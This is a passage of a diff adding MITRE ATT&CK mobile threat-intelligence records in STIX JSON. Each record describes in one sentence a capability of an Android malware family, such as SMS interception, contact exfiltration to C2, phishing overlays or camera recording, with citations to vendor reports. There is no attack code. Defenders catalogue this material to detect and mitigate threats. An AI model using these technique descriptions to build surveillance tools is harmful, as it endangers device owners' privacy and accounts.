"relationship--2c9ad579-0c29-4f2a-80f3-242dc6b0bafd", + "type": "relationship", + "created": "2020-09-11T14:54:16.644Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.644Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can list files stored on external storage.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b1e5bd2f-01e4-402d-a9b6-255110510a83", + "type": "relationship", + "created": "2020-12-24T21:45:56.986Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T21:45:56.986Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can install new applications which are obtained from the C2 server.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a8079e6a-ef87-4e3b-9f71-cf1ea2360892", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:53:24.312Z", + "description": "[Adups](https://attack.mitre.org/software/S0309) transmitted contact lists.(Citation: NYTimes-BackDoor)", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1c42ee3a-c400-4de6-84aa-b254422af7b9", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": 
"CheckPoint-Judy", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Judy](https://attack.mitre.org/software/S0325) uses infected devices to generate fraudulent clicks on advertisements to generate revenue.(Citation: CheckPoint-Judy)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0bcdeb29-6eed-4c96-a9ae-e56aadc4a5db", + "type": "relationship", + "created": "2019-08-09T17:59:48.988Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:48.988Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) can record and take pictures using the front and back cameras.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5ced57a7-b674-40d4-98b8-a090963a6ade", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-09-18T13:45:58.872Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) abuses Accessibility features to steal messages from popular apps such as WeChat, Skype, Viber, and QQ.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b43f4cef-138e-4b5d-8e68-e8eeae3591be", + "created": "2021-02-17T20:43:52.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. 
Retrieved November 11, 2020.", + "url": "https://blog.lookout.com/frozencell-mobile-threat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:30:32.294Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has read SMS messages for exfiltration.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--da4296d7-5fdb-45b6-9791-b023d634c08d", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. 
Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.760Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can record location.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cc81b56c-cf73-4307-b950-e80246985195", + "created": "2019-10-18T14:50:57.473Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "OS security updates typically contain exploit patches when disclosed.", + "modified": "2022-03-28T19:20:44.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d63f27cf-95a3-42bb-86dd-dc18e22cb898", + "created": "2019-09-04T14:28:16.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:41:16.423Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve call history.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--36268322-9f5e-4749-8760-6430178a3d68", + "created": "2020-06-26T14:55:13.311Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. 
Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:25:08.956Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can intercept SMS messages.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--35927c96-7645-4ef3-b3da-e44822386a10", + "created": "2023-01-18T21:43:10.838Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. 
Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:47:19.403Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) contains domain generation algorithms to use as backups in case the hardcoded C2 domains are unavailable.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d1318f71-7f70-4820-a3fc-0d05af038733", + "created": "2021-10-01T14:42:49.154Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can perform actions when one of two hardcoded magic SMS strings is received.(Citation: SecureList BusyGasper)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5977289e-d38f-4974-912b-2151fc00c850", + "type": "relationship", + "created": "2020-11-20T16:37:28.524Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-11-20T16:37:28.524Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect the device’s phone number and IMSI.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--afe9e326-01f7-4296-a11b-09cfffd80120", + "type": "relationship", + "created": "2020-07-27T14:14:56.962Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-10T22:18:20.747Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can simulate user clicks on ads and system prompts to create new Google accounts.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c6241ba3-e0f9-48a7-9ed7-a5544a090081", + "type": "relationship", + "created": "2019-09-04T14:28:16.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). 
Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.856Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can track the device's location.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0f7e7c29-43f0-4aff-ae83-dfff331915ef", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. 
Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "modified": "2019-10-10T15:24:09.248Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) collects the device's location.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--98ae9cb2-1141-48c6-81fd-f16adb430031", + "created": "2023-01-18T19:17:07.565Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:07:52.850Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can request the `READ_EXTERNAL_STORAGE` and `WRITE_EXTERNAL_STORAGE` Android permissions.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22f5308c-77ee-4198-be1c-54062aa6a613", + "created": "2020-12-31T18:25:05.160Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:00:13.616Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has used HTTPS for C2 communication.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--74c3c88c-956b-4bc7-9ea2-585e7366fe69", + "created": "2020-04-08T15:51:25.078Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Ginp](https://attack.mitre.org/software/S0423) can use a multi-step phishing overlay to capture banking credentials and then credit card numbers after login.(Citation: ThreatFabric Ginp)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc82546-f4da-4f47-88ec-b215edb1d695", + "type": "relationship", + "created": "2021-02-08T16:36:20.799Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." 
+ } + ], + "modified": "2021-05-24T13:16:56.589Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included malware functionality capable of downloading new DEX files at runtime during Operation BULL.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e34c8c23-be8f-4da9-b051-5246e5f16ba8", + "created": "2023-03-01T22:18:19.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:14:48.174Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can send contact lists to its C2 server.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e", + "created": "2022-03-30T19:29:07.379Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Inform users that device rooting or granting unnecessary access to the accessibility service presents security risks that could be taken advantage of without their knowledge.", + "modified": "2022-03-30T19:29:07.379Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--55afe9a0-d261-48ea-b5a8-0b1685ff2f15", + "type": "relationship", + "created": "2020-04-24T15:06:33.319Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.319Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect voice notes, device accounts, and gallery images.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c4e73a6c-d523-4f3c-bcb6-200f63867fb4", + "type": "relationship", + "created": "2020-09-11T15:57:37.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-09-11T15:57:37.770Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can delete SMS messages.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c9c22e0d-c427-42ef-ae76-beb8ae9f6bf2", + "created": "2020-09-15T15:18:12.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:58:31.945Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect the device’s network information.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 